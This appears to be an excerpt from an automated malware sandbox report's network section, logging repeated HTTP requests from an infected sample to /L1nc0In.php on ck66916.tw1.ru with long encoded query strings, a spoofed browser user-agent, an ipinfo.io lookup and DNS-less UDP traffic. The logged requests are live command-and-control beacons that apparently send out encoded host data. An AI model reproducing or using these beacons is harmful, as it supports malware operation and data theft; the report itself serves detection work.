SwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?iUu=8R7Isg&ee5ae8efe50125d60098b1ca132932bc=49479fbd79a245ee458d40f1dd85aa54&650a0c21718513cd4feada722441e9dc=gMjRGOkJjYmNWNxMmYiZzMiVTN1UmNhBzNzMTZldTY4kTYxUWNwQmN&iUu=8R7Isg HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiI2kDO5gzN1YmYiBDOwQmN5AjNllDM4cTO2EDM5UTNklTY3MzMidDOhJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&37532c7004eeb8757d3cb2e9a0f20a99=0VfiAjRaxmUuNGaSNzYnRzVh5mVIJWUCNFTntGVNZTUU5kNBRUTnFlaNdXS6xkMBpHT6lkeXJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiI2kDO5gzN1YmYiBDOwQmN5AjNllDM4cTO2EDM5UTNklTY3MzMidDOhJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=d1nIiojIyQGM3ImNjJGOiNDOjJTZ4kjNmZWZ4U2M5ETOiZDOkBjIsISZkdDZjNjN1kDO4YzNzMmNzUGNidDOmRWO4ATM1EjYyEDN3U2YkFzNiojIjZTNiBzNjNWMkBDO0Y2N1YjNwIWZxcDN0UjM2MDM4UjIsIiN3Q2YkRjYxkDZilDNilzN0EmNlZzNkJGO5MjYjZWZ0ATYlZWMwYmNiojI5YDN4EDNxAzMiBjMlZTO0UzYwMWYlhDNjVWZwMGMjhjI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzl0UaJDbHRmaGtWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIhFWN4YzY5IjZyIWZ5gTZycjY3EDOyYzYwAzN0YmM5MmZwcTZhNWY3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&37532c7004eeb8757d3cb2e9a0f20a99=d1nIRZWa0IjYwJFWklGbtNGMOhVYFZVbjhGZIRWb5ITVjhnVZBjRHJFdG12YulTbjFFeGhlNNtWS2k0QhBjRHVVa3lWS1R2MiVHdtJmVKl2Tpd2RkhmQGpVe5ITW6x2RSl2dplUavpWSvJFWZFVMXlVekdlWzZ1RWl2dplUavpWS6JESjJUMXlFbSNTVpdXaJVHZzIWd01mYWpUaPlWUVNVeWJzYWFzVZxmUzUVa3lWS1R2MiVHdtJmVKl2TplEWapnVWJGaWdEZUp0QMlGNyQmd1ITY1ZFbJZTS5pVdGdEV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWSvJFWZFVMXlFbSNTVpdXaJhmWqlFaxMUT0klaOJTUE1Ua05GT5IERNdXQE10dBRUT1VkaMdHND10NKl2Tp1EWaVXOHF2d502Yqx2VUl2dplUavpWS6FzVZpmSXpFWKNETpRzRYlHeW1kWGVEVR5kVTVEeGhVd3ZEWjhHbJZTS5NWdWdlW55kMVl2dplUdkNjY1RXbiZlSp9UaBZ1UPZURUl2dpl0QkVUSwkUaPlGMVF1UKNETpRjMkZXNyEWdWxWS2k0QiNnRyQGbKhVYHp0QMlWSYp1a1clWtZ1RSdWTzQmdS1mYwRGbJZTS5NWMKhVYyw2RkVnRrl0cJlWUIpVRXJTSp9Ua0IjYw5kbjxmWxUFUstWUpdXaJlXUE9EeFpWT4VkaNlHND5kMJtGTwkkaNVTSE90dJpGTXJERNVXRE1UejZFVXpUaPlWVXJGa1ATVQx2aRl2dplUMFRlT1kFVPdXQU1EMFpWTwUlaNVTSp9UaRV1UrpEWZZnStNGbodEZ2FzaJNXSpF1TSpHVDZVVNhkUU5UavpWS5ZVbjFjUzkFaadFZ1Z0VUtmSYlldK12Ysh2RkZXMrl0cJNkTUZFRWhlTq5UN0ADVp9maJxWMXl1TS12YolTbZlnVHFGM5cFVpdXaJhXSYp1c4JjY5JlbiZnTwIGbSdVYXpUaPlWUXNFbOdVYyY1RSZlQxIVa3lWS2gWRJBTWqlkNJNlWwYUbV9mTYpVeadlWT